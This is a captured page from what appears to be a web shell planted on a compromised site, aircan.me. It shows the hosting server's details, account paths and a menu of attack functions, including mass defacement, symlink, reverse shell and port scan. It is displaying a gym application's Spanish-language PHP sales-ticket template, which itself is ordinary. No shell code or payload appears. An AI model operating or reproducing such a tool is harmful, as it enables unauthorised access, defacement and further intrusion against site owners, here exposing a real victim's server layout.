Tul xxx Tul
User / IP
:
216.73.216.191
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
gimnasiofitnes
/
app
/
Views
/
admin
/
sales
/
Viewing: sale_ticket.php
<!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Ticket de Venta</title> <link rel="stylesheet" href="<?= base_url('assets/admin/css/ticket.css'); ?>"> </head> <body> <div class="ticket"> <!-- Detalles de la Empresa --> <div class="company-details"> <h3><?= $company['name'] ?></h3> <p><?= $company['address'] ?></p> <p>Tel: <?= $company['phone'] ?></p> </div> <!-- Detalles de la Venta --> <div class="sale-details"> <p><strong>Fecha:</strong> <?= date('d/m/Y H:i:s', strtotime($sale['created_at'])) ?></p> <p><strong>Cliente:</strong> <?= $sale['user_name'] ?></p> <p><strong>Método de Pago:</strong> <?= $sale['payment_method_name'] ?></p> <p><strong>Tipo de Venta:</strong> <?= ucfirst($sale['payment_type']) ?></p> </div> <!-- Detalles de los Items --> <table class="items-table"> <thead> <tr> <th>Cant</th> <th>Descripción</th> <th>Precio</th> <th>Total</th> </tr> </thead> <tbody> <?php foreach ($detailsSale as $item): ?> <tr> <td><?= $item['quantity'] ?></td> <td><?= $item['product'] ?></td> <td><?= get_currency() ?> <?= number_format($item['price'], 2) ?></td> <td><?= get_currency() ?> <?= number_format($item['price'] * $item['quantity'], 2) ?></td> </tr> <?php endforeach; ?> </tbody> </table> <!-- Totales --> <div class="total" style="text-align: right; margin-top: 10px;"> <?php if ($sale['discount_perc'] > 0): ?> <p><strong>Subtotal:</strong> <?= get_currency() ?> <?= number_format($sale['total'] + $sale['discount_amount'], 2) ?></p> <p><strong>Descuento (<?= number_format($sale['discount_perc'], 1) ?>%):</strong> - <?= get_currency() ?> <?= number_format($sale['discount_amount'], 2) ?></p> <?php endif; ?> <p style="font-size: 1.2em;"><strong>Total:</strong> <?= get_currency() ?> <?= number_format($sale['total'], 2) ?></p> </div> <!-- Footer --> <div class="footer"> <p><?= esc($company['ticket_message'] ?? '¡Gracias por su compra!') ?></p> <?php if (!empty($qrBase64)): ?> <div class="qr-container"> <img src="<?= $qrBase64 ?>" class="qr-code"> <p style="font-size: 8px; margin-top: 5px;">TU CÓDIGO DE ACCESO</p> </div> <?php endif; ?> <p><?= $company['website'] ?></p> </div> </div> </body> </html>
Coded With 💗 by
0x6ick